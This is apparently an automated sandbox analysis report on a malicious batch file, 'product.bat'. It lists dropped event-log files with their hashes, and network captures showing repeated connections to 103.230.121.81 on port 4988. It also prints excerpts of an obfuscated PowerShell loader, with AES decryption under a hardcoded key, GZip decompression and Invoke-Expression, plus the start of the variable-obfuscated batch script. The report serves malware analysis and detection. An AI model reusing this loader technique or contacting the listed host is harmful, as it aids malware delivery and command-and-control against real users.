                                                SHA1:5531DE053D5A619ED87057D1B9024548A1618205
                                                SHA-256:F3FA667B3C12A8277C7045B7AC9F5F1EC5DB05464BCFDC0BB2463A4DFF5E28AD
                                                SHA-512:3F2328A635CF8D7FCF16152E8B3BD5CE530596AB8D4E86ABD1BD128AED95615DE806D99FDCB40CA95474876C41BED78F46CFA04F3D4C159240A375BB05F7A551
                                                Malicious:false
                                                Preview:ElfChnk.........@...............@...............h...zg.b.....................................................................;..................h...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................................A...................................**..P.............C"a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.4157482482643835
                                                Encrypted:false
                                                SSDEEP:384:8haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJgXJRpXJBgXJQXJBvXJnXJSc:8Q0yUkNYwD8imLEoRfBoYb5GO
                                                MD5:A886E83D1948FFB2BF4A2B744DDCCBD3
                                                SHA1:0074C53E8984FB0024DE0485447D3E1081B34D0B
                                                SHA-256:6DD70CE24E770699A142E13D62B090F64E00CD0A8501FC2D31E0ED5F9DFAB004
                                                SHA-512:3263F89608AEB4140553E587A3946E352391DAAC7DF85ABF0358A39B45103655DAE1DE29616A71142C4BB42FD1C0273F3E3B2F6900CCDE672F36ADBB3F7629D1
                                                Malicious:false
                                                Preview:ElfChnk......................................D...G..B.f......................................................................0.................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........3..................................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.342266575776689
                                                Encrypted:false
                                                SSDEEP:384:Chbm8mJmAwmsmkmtmZjm9mEJmSmSgmMmJmyFmgmPm4mOmdm9mHbkmzm7m6mBmdmv:CA74DcxI1c8PF
                                                MD5:302AE7C3FB3FBC33D19DBFB4CA97D867
                                                SHA1:86165BE8A181F1DE44CC86F75E36890C0379AB94
                                                SHA-256:1183791BE47DD2268E48827BC2B2F8D2F50C6265AF23904E15E35A8A4715B3DB
                                                SHA-512:AEE86973AE3C7844DF4EAA3406ECCF1AD59EF458F1623A35B84246B26C83229441B76C64A2502D2F9EF298DAF450D0069C6180A99B041A1D2B9DAD57B6F8A816
                                                Malicious:false
                                                Preview:ElfChnk......................................6..P8...P\<........................................................................................R.......................z...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........;...........+.......................................................**...............21.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.711346426112008
                                                Encrypted:false
                                                SSDEEP:192:7V7rDiDxFYzDiDPDiDfDiDDDiDxDiDUDiDgDiDsDiDQDiDEDiDYDiDEDiD:7hr2ts2T2z2n2N2w202w2M2Y2E2I2
                                                MD5:F911674F42FFA9096A39B15D79861134
                                                SHA1:14C46673DAB47906E3693ABC048CD0C2FADBECB6
                                                SHA-256:1668A045EF7528D741AAD61574F673D564D9BC7831A57FB6CD4A4D25C3FCA4B5
                                                SHA-512:2341C1145DCD1E714D0A16CFE517CCD8F0BF6F94A45882A4142B2D90B27A1ACD4F4508AF7E49A52B0B0F2E418EEC461EF2CBB0463D48CC48E08E6880A617B442
                                                Malicious:false
                                                Preview:ElfChnk................................................(....................................................................4.KU................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F...............................-...................................&...............................................................................**..............IL..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.841712479680417
                                                Encrypted:false
                                                SSDEEP:384:aBh7RucVRDRbR2R3RgRxR5RrGRRrRuRVRERfRzRwRQRoRTyDR6RQR36RMGRPRHR8:aBNzUhK3aD
                                                MD5:DADAD412976D9F9EA0EED52DE42DF6E7
                                                SHA1:A928A47DCDBB2FA1D7C86470B0AE3AB72FE372E6
                                                SHA-256:4394C069F66A90CEC76AB185BA009B13234EDC4A2ED3A5890FA787FAD0E730A6
                                                SHA-512:AD8DF9C5410CA28CA38BF35CD51A97E1ACFA9B76AA51C4D8A7D59D88CFBC68E3BEB7F3EE2F647ADD9126C6718F720F4316D37C923E3F57AD1620B4CB17F269D5
                                                Malicious:false
                                                Preview:ElfChnk.:.......v.......:.......v...............x...........................................................................%..................................F.......|...=.......................................`.......................u...-......................................................f...b..........?.......................`.......A.......G.......M...F.......................................................................................&...........9.......9.......................................**......:.........*_..........^..&........^..~.]i.../.l.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.260359446709512
                                                Encrypted:false
                                                SSDEEP:384:fhRhwhdhP0h9hzehShchawhZh4hhhshphihXhMhxhzhwhohGh5h3hShChWhzhLh4:fmFpkBzBiELmn
                                                MD5:067AD5BE5D9DAC2F9972EA7CCD899B43
                                                SHA1:EDD013A75A95D510CCEBA7DF86938621FA17E518
                                                SHA-256:EE5349F31C79D30F8AB2023451ECC640BD33C7F038ED6951D0F9FF2FE82BA0E7
                                                SHA-512:F2E20C281CD6E14FBDDCE8C89055CF5BC6A3C79E5D65037B269B11F2500E750A15998C9A29365F7D5903E4CF568EA45026E9F340A0318C212E8AD936EA2B3F65
                                                Malicious:false
                                                Preview:ElfChnk.........................................`...........................................................................3i._........................................@...=...........................................................................................................................f...............?...........................m...................M...F...........................................i.......................&.......................................................y.......................**................9.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.2594795605878295
                                                Encrypted:false
                                                SSDEEP:384:LhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVHV7Vj0V1VXFVq:LyjbPac
                                                MD5:33C02B19501869BF7DF6F6BF1D2E6BF6
                                                SHA1:D90AF4BD50FE734A1E74ACC4E0704FEE1346F8D4
                                                SHA-256:6453729FD9D539566FC7AA3CE013B958C237E0E713AA917444F453C02A96F3BB
                                                SHA-512:B4D4A162E59651477CE87DE756F9DBD7634A206CA7FA83CA61DD73F86CAE343083AFF067A981DE096AAB1AE6997E599397E4851648800B2BCDAA6E5BAC0797A8
                                                Malicious:false
                                                Preview:ElfChnk........."..............."...........h8...9....?......................................................................Z..................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......&*..............................................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.222797681939505
                                                Encrypted:false
                                                SSDEEP:384:vRhcBwBuBwB+BwBZwDIBwBoK/oyBwBY/puBwBN0bNoBwByQZBwBY/UUBwBY/5BwL:JI0bKWHrL
                                                MD5:3B70AE481901772C5DA852F7B1ACD786
                                                SHA1:F09B57721AC9A69207032EFDFB2692A93458F50A
                                                SHA-256:070A510039728BF70064D5FC10DAE57DA67C69A5FA6ECE870D0E4C2C1A2AC354
                                                SHA-512:B7E9B57B32774D821C3759E8E9FA5A16E99E02D801EB9F7494C940B79690378249536FAF4D23282CEEE595DD00644BFAE6BAECE724B830BC17847797C52CE28A
                                                Malicious:false
                                                Preview:ElfChnk.....................................H;..x>...,.U......................................................................(.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................o.......................................&...............................................................................**..(...............`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.423183909657457
                                                Encrypted:false
                                                SSDEEP:384:/hGUEBUEYUEQUEhUE8UE5UE5UE8UExUEFUELUEVUEyUEXUEDUEuDUEBUEWUEzUE3:/P7s3NxG9
                                                MD5:718C0E7FA4C2A524A5FF961FEB987C13
                                                SHA1:73CB0C09C67332548F50613AA349E12695C715A2
                                                SHA-256:461F7778DD38ABE30403674C9E34EFF22F91AB7D4C207FB8CD2C4B31773588CC
                                                SHA-512:6A7705597D00B2193F3ECD79CDCD4B6D97DA36B879ECBC2E5F8EA3A8B77D9FA301B14E68BBB9ACBBF72B695DC83E66493F3C4D1DD94B1FC9D0E4ABA787BD853B
                                                Malicious:false
                                                Preview:ElfChnk.....................................0`...a.....r........................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................A.......................**.................`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):75688
                                                Entropy (8bit):4.270608972262599
                                                Encrypted:false
                                                SSDEEP:384:dFRCBu2s7N0oGMtUlXoxMtTl3AgFRCBu2s7N0oGMtUlXoxMtTl3ApovMtYolQM3g:/S+69S+6ONASbkh
                                                MD5:95D16DD44181BF63726777AA40B87BF7
                                                SHA1:DF13A03F1E0AEFD9443EE7DC1B8AC2F271A14136
                                                SHA-256:F913B2271EA1A9676BC7A3A73393BE700BA16E97BAA3A0C18CBC3CCF178C4896
                                                SHA-512:4202C520DE768436162A2F2EC0A3DFDB2E37728F9D21B9B99A377CB6C6F032ACBA1D6B39FF7889009A8E1E1B5F409C28E49DAE905D24AAAA1650CF3E1A0EF96F
                                                Malicious:false
                                                Preview:ElfChnk.................$.......*............%...'..Y..Q...............................................................................!.......z...s...h...................=...................................................N...............................................w.......<.......................5...................................c...........).......M...Z...:...............................S...............................V....#..................................................................&.......**..0...$.......7"..ZM.........<.@&........<.@.o.S....../.G.......A..;...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....d...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):83744
                                                Entropy (8bit):4.426183207436119
                                                Encrypted:false
                                                SSDEEP:384:QFRXABHIBwpYCs3Go3+ztJyjsFRXABHIBwpYCs3Go3+ztJyjpI74mjo6bPwtrQMz:mWWDKWWDXi1UW0N3HpRAtFdWWDRc
                                                MD5:BCF574E305425737D4E12CA8E7EED110
                                                SHA1:6316CB1929AD9649B32EA95791676D0042A1DA53
                                                SHA-256:F3554C957866BA94242085947DFA6E44EE2BB68A18DE26106D8EC60241F4FA78
                                                SHA-512:B5D292EC172211DA35BC38AB87BBA9AC322BA675A04DD32C090FAAC206D5CCFC7DE84D581FA2C8120EBDFE38F58D922471902B2FC45F770CCD4B35DEA009F770
                                                Malicious:false
                                                Preview:ElfChnk.....................................x ..8"...y.c....................................................................za)E....................s...h...................=...................................................N...............................................w.......8.......................M..................................._...........).......M...;...:...........................................................q...............................................&.......................&.......i...**..............7"..ZM.........v..&........v..Tr].4....E.C.......A..7...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....`...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):80608
                                                Entropy (8bit):3.834523967266329
                                                Encrypted:false
                                                SSDEEP:384:1Q+wG828Q+wG822N4As47t+9t+v3uHaQ3Ry3iOEKTr3I8/ZuzqSc7OYJshxuxn84:1sGN4r47OXHaQhy3ixjp
                                                MD5:B740878AFA430C0B2AA2F2224BEEC76C
                                                SHA1:B632B0AE478C477C69169251B3E79C6BD9B1B1AD
                                                SHA-256:D5630350D12270372CC82088D2F580550BACA955EA5211FE90ABDF9380098F79
                                                SHA-512:F36080D9C61FF30E2D0019E59600BCCC094B0D29B219EAD8085207C8B9A0422B6281E94602FC32906CF1D4A26A7D1822B782B2F23AF82E312B8B925DE6AE4D90
                                                Malicious:false
                                                Preview:ElfChnk.................y....................6...:...........................................................................-.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................v.......................................................................................&...............................**......y...........ZM........L.-9&.......L.-9...P..K`..$5........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (2187), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2390
                                                Entropy (8bit):5.7490302094337595
                                                Encrypted:false
                                                SSDEEP:48:9JFHDRIR5RzxRxBB3rkxB3hXlQiyBluoD0FEQ1C0bWAo2U82UI2U7n+:PFHDRIDxx7BB7GB5lQr6KrQbHo2T2/2Z
                                                MD5:0A3E9785482BA3B6B8B08D5FAB6B2D10
                                                SHA1:A8B86D25505BFC949AC95AF9E7D9D94E739A3B14
                                                SHA-256:E3D153DDBB7B48D09C1AB188737F91809C3C2622F5067C56BECEAB3DEE97C7C0
                                                SHA-512:C8CE77FB1A5A2C427181472DD640D7F3AFFD5844730A08311C9295555C54534BC5A4B39C88609162997171BC2F90C9A541B55EBDC052B8E210B917D42A7DAD12
                                                Malicious:false
                                                Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function vhVnA($zVdEq){.$TQYfY=[System.Security.Cryptography.Aes]::Create();.$TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA=');.$TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q==');.$bqyNP=$TQYfY.CreateDecryptor();.$fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length);.$bqyNP.Dispose();.$TQYfY.Dispose();.$fZHAT;}function FpYMp($zVdEq){.Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', '');.Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*S
                                                File type:DOS batch file, ASCII text, with very long lines (3583), with CRLF line terminators
                                                Entropy (8bit):6.016969361705345
                                                TrID:
                                                • BibTeX references (5501/1) 100.00%
                                                File name:product.bat
                                                File size:7'309'406 bytes
                                                MD5:f3454e2cb275019527e248cb08111111
                                                SHA1:4180893cca4dce02e0bbeab52b5a099201db5ffb
                                                SHA256:0999322e8a2a984b5400544b31a91ae8dd49b362a2517fe497a8e1455de07d8f
                                                SHA512:489a89ab9d9a1423ccd18931f74707851d4e3add00306f7bdccce511de308d1fabc14cb734925d78609fd522402e9abea1106b1765d5c90a27c32a2a5889c7cc
                                                SSDEEP:49152:RjtZxa9XGka7V+vlw0ELOZA1NEITyfi7SlSjncYHEJ9MFrbwjMxGQMH+INp1YHpy:Y
                                                TLSH:847633923EE42FDE0BAEC51EF15E7AAD67D60F53446EE08745E212C7067EE822D12C11
                                                File Content Preview:@echo off..%hHWGUYBuKQfdXizhnralBipksPqZjjVATDyHbfvAfWacuRgvQmYUuhvZsMoeH%@%lAUEjtJSghWAfEhmPAJUiWlbgMizpoQrTDLAiPHM%%YgQYUbQRgXOuMtooTyxlkCRrEGCTGdaSWikQvdlKrHjrcWgkwl%e%qkBBvoztnzWkcWVxDixTPnMTC%%AoIzswvOJIvGPCVKXluwgugyDbZrzd%c%IZbOkLOgAPnnncXtVYfpAyfm
                                                Icon Hash:9686878b929a9886
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 13:31:44.906560898 CET497644988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:45.026395082 CET498849764103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:45.026478052 CET497644988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:45.069238901 CET497644988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:45.188967943 CET498849764103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:47.716533899 CET498849764103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:47.717075109 CET497644988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:47.723992109 CET497644988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:47.843774080 CET498849764103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:51.184678078 CET497804988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:51.304583073 CET498849780103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:51.304728031 CET497804988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:51.305171013 CET497804988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:51.424901962 CET498849780103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:53.994916916 CET498849780103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:53.995014906 CET497804988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:54.007051945 CET497804988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:54.126924038 CET498849780103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:57.389427900 CET497944988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:57.509746075 CET498849794103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:31:57.510284901 CET497944988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:57.510284901 CET497944988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:31:57.630240917 CET498849794103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:00.213212967 CET498849794103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:00.213335991 CET497944988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:00.214236975 CET497944988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:00.333976984 CET498849794103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:03.597726107 CET498084988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:03.717781067 CET498849808103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:03.717938900 CET498084988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:03.718460083 CET498084988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:03.838277102 CET498849808103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:06.435007095 CET498849808103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:06.435105085 CET498084988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:06.435539961 CET498084988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:06.555463076 CET498849808103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:10.168483973 CET498254988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:10.289613008 CET498849825103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:10.289802074 CET498254988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:10.290107012 CET498254988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:10.411497116 CET498849825103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:13.028764963 CET498849825103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:13.028918028 CET498254988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:13.029366016 CET498254988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:13.151463985 CET498849825103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:16.309225082 CET498404988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:16.527679920 CET498849840103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:16.527818918 CET498404988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:16.528166056 CET498404988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:16.647841930 CET498849840103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:19.222346067 CET498849840103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:19.222475052 CET498404988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:19.222812891 CET498404988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:19.342523098 CET498849840103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:23.715643883 CET498574988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:23.835444927 CET498849857103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:23.835540056 CET498574988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:23.835954905 CET498574988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:23.955765009 CET498849857103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:26.528444052 CET498849857103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:26.528553963 CET498574988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:26.532408953 CET498574988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:26.652323008 CET498849857103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:30.065619946 CET498724988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:30.185944080 CET498849872103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:30.186074018 CET498724988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:30.186475992 CET498724988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:30.306360006 CET498849872103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:32.866753101 CET498849872103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:32:32.866816998 CET498724988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:32.867218971 CET498724988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:32:32.989048004 CET498849872103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:33:06.990341902 CET498834988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:33:07.111438036 CET498849883103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:33:07.111531973 CET498834988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:33:09.873281956 CET498849883103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:33:09.873404980 CET498834988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:33:11.980873108 CET498834988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:33:11.981216908 CET498834988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:33:12.100771904 CET498849883103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:33:12.100831985 CET498849883103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:14.353902102 CET498924988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:14.474275112 CET498849892103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:14.474529028 CET498924988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:17.154525042 CET498849892103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:17.159332037 CET498924988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:19.669526100 CET498924988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:19.670022964 CET498924988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:19.790824890 CET498849892103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:19.791043997 CET498849892103.230.121.81192.168.2.7
                                                Dec 13, 2024 13:34:28.998346090 CET498934988192.168.2.7103.230.121.81
                                                Dec 13, 2024 13:34:29.119246960 CET498849893103.230.121.81192.168.2.7
